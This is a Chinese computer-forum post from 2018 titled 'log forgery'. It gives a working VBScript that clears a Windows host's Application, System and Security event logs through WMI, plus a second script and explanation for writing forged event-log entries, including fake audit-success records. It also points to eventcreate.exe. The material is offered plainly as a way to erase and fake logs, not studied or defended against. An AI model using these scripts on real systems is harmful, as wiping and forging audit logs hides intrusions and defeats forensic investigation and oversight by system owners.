电脑计算机论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

查看: 1348|回复: 0

日志伪造

[复制链接]
admin 发表于 2018-8-30 10:08:05 | 显示全部楼层 |阅读模式

删除日志VBS:

cleanevent.vbs

strComputer = "主机名字By foolishqiang"

Set objWMIService = GetObject("winmgmts:" _

& "{impersonationLevel=impersonate,(Backup)}!\\" & _

strComputer & "\root\cimv2")

dim mylogs(3)

mylogs(1)="application"

mylogs(2)="system"

mylogs(3)="security"

for Each logs in mylogs

Set colLogFiles = objWMIService.ExecQuery _

("Select * from Win32_NTEventLogFile where LogFileName='"&logs&"'")

For Each objLogfile in colLogFiles

objLogFile.ClearEventLog()

Next

next

//////////////////////////////////////////////////


伪造日记,看代码:

///////////////////////////////////////////////

伪造一份日志

createlog.vbs

  set ws=wscript.createobject("Wscript.shell")

  ws.logevent 0 ,"write log success" '创建一个成功执行日志

  logevent方法

  logevent的用法:logevent eventtype,"description" [,remote system]

  eventtype 为日志类型,可以使用的如下:0 成功执行;1 执行出错;2 警告;4 信息;8 成功审计;16 故障审计

  所以上面代码中,把0改为1,2,4,8,16均可,引号下的为日志描述。

附:

XP下有一个新的工具可以创建日志eventcreate.exe


您需要登录后才可以回帖 登录 | 注册

本版积分规则


QQ|手机版|小黑屋|电脑计算机论坛 ( 京ICP备2022023538号-1 )

GMT+8, 2024-11-27 03:48 , Processed in 0.092420 second(s), 21 queries .

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表